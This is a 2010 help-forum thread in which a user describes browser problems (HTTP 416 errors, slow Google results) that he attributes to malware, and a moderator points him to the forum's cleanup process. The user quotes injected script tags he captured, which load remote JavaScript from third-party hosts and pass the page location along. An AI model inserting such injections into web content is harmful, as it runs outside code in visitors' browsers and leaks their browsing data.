Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Firefox HTTP error 416 requested range not satisfiable


  • Please log in to reply
2 replies to this topic

#1 Rohan Carly

Rohan Carly

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:10:41 AM

Posted 13 April 2010 - 01:42 AM

Hi, I am reasonably certain that malware took-hold of my Firefox and IE browsers on my PC. I thought my experience might be helpful to the staff here, or other users trying to diagnose the same problem.

At this stage my problem seems to be fixed, but thought I should document what happened.

Symptoms:
--------------

1. Firefox would display most of my home page – http://rohan.id.au but appear to continue downloading. Reloading the page via Home button or Reload produced HTTP 416 error: “firefox 3.6.3 "requested range not satisfiable"”. Also tested with a simple well-known web page created by a third-party: http://cr.yp.to -- similar results.

2. Internet Explorer 8 would take a long time to return results from http://google.com


Google Chrome was unaffected.



Diagnosing
--------------

I loaded my home page in IE8, and in “View Source” you would see Javascript appended at the bottom:

&lt;script type="text/javascript" src="http://context.google.com/ab.js"></script></BODY>

I double-checked on the web-server (because I made the content), and there was no such text in the HTML source.


Using Firefox "Live HTTP headers" addon, I noticed things in the log like:

if(top == self)
{
document.write('&lt;script type="text/javascript" src="http://feedma.com/cgi-bin/cont/conttt.cgi?uuid=1abf66fd99eeb247a3a8726559f2cff2&ref='+top.location+'" charset="utf-8"></script>');
}


In Ethereal packet-sniffer, I detected traffic to feedma.com



Solution
-----------

I was bad and ran Combofix without asking for help -- sorry about that, I didn't realise the nature of Combofix at the time. So other readers shouldn't copy me -- instead obey the instructions posted on this forum concerning asking for help first.

Luckily, I ran Combofix, and it seemed to solve my problem. I could share with you what it said in its log if you like.



If someone knowledgeable could tell me what sort of Malware I was dealing with, I'd be interested to know.

BC AdBot (Login to Remove)

 


#2 Orange Blossom

Orange Blossom

    OBleepin Investigator


  • Moderator
  • 36,944 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Bloomington, IN
  • Local time:10:41 PM

Posted 13 May 2010 - 11:57 PM

Hello,


Please read this topic: http://www.bleepingcomputer.com/forums/t/273628/combofix-usage-questions-help-look-here/ which discusses the use of ComboFix.

Please follow the instructions in ==>This Guide<== starting at step 6.

Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Since you have run ComboFix, please include the ComboFix log in the new topic.

If you cannot produce any of the other logs, then please create the new topic anyway, include the information that you were unable to produce the other logs and why and include the ComboFix log along with a description of your computer issues.

Orange Blossom :thumbsup:
Help us help you. If HelpBot replies, you MUST follow step 1 in its reply so we know you need help.

Orange Blossom

An ounce of prevention is worth a pound of cure

SpywareBlaster, WinPatrol Plus, ESET Smart Security, Malwarebytes' Anti-Malware, NoScript Firefox ext., Norton noscript

#3 Rohan Carly

Rohan Carly
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:10:41 AM

Posted 30 August 2010 - 04:01 AM

Dear Orange Blossom,

Thanks for replying to my query. Unfortunately, by the time I received your answer, I could not make time to go through the suggested process.

I have since reloaded my PC with a new operating system.

I did keep my Combofix logs in case this is useful to someone in the future. You can now close this thread.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users